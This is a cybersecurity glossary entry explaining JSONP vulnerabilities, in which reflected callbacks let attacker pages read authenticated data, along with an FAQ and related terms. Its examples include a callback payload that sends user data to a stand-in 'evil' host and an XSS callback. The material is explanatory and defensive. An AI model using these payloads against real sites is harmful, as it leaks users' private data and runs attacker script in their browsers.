JSONP Vulnerability
What is JSONP Vulnerability?
JSONP VulnerabilityCross-origin data leak caused by JSONP endpoints that return sensitive, authenticated data wrapped in an attacker-supplied callback function.
JSONP (JSON with Padding) is a legacy cross-origin technique in which a server returns JavaScript of the form callback({...}) so a remote page can include it via <script src>. JSONP vulnerabilities arise when such endpoints expose authenticated user data and the callback parameter is reflected without validation: an attacker hosts a page that loads the JSONP URL with their own function name and captures the response, bypassing the same-origin policy and SameSite cookie protections of the era. The pattern also enables XSS if attacker-controlled content is reflected outside of a valid identifier. Modern best practice is to remove JSONP entirely, replace it with CORS-protected JSON, and never expose sensitive endpoints to <script> inclusion.
● Examples
- 01
/api/me?callback=window['x']=function(d){fetch('https://evil/?d='+JSON.stringify(d))}.
- 02
Callback parameter reflected verbatim, allowing XSS via callback=alert(1)//.
● Frequently asked questions
What is JSONP Vulnerability?
Cross-origin data leak caused by JSONP endpoints that return sensitive, authenticated data wrapped in an attacker-supplied callback function. It belongs to the Attacks & Threats category of cybersecurity.
What does JSONP Vulnerability mean?
Cross-origin data leak caused by JSONP endpoints that return sensitive, authenticated data wrapped in an attacker-supplied callback function.
How does JSONP Vulnerability work?
JSONP (JSON with Padding) is a legacy cross-origin technique in which a server returns JavaScript of the form callback({...}) so a remote page can include it via <script src>. JSONP vulnerabilities arise when such endpoints expose authenticated user data and the callback parameter is reflected without validation: an attacker hosts a page that loads the JSONP URL with their own function name and captures the response, bypassing the same-origin policy and SameSite cookie protections of the era. The pattern also enables XSS if attacker-controlled content is reflected outside of a valid identifier. Modern best practice is to remove JSONP entirely, replace it with CORS-protected JSON, and never expose sensitive endpoints to <script> inclusion.
How do you defend against JSONP Vulnerability?
Defences for JSONP Vulnerability typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for JSONP Vulnerability?
Common alternative names include: JSONP leak, JSONP hijacking.
● Related terms
- appsec№ 223
CORS (Cross-Origin Resource Sharing)
A browser-enforced mechanism that lets a server selectively relax the Same-Origin Policy so that JavaScript on one origin can read responses from another.
- attacks№ 224
CORS Misconfiguration
An insecure CORS policy that allows untrusted origins to read authenticated responses, often by reflecting the Origin header and returning Access-Control-Allow-Credentials: true.
- attacks№ 240
Cross-Site Scripting (XSS)
A web vulnerability that allows attackers to inject malicious scripts into pages viewed by other users, executing in the victim's browser under the site's origin.
- appsec№ 960
Same-Origin Policy (SOP)
Browser security rule that restricts how a document or script loaded from one origin can interact with a resource from a different origin.
- attacks№ 239
Cross-Site Request Forgery (CSRF)
A web attack that forces an authenticated user's browser to send unwanted requests to a vulnerable site, causing state-changing actions without consent.
- attacks№ 1016
Session Hijacking
An attack that takes over a victim's authenticated session by stealing or forging the session identifier so the attacker can act as the user without their credentials.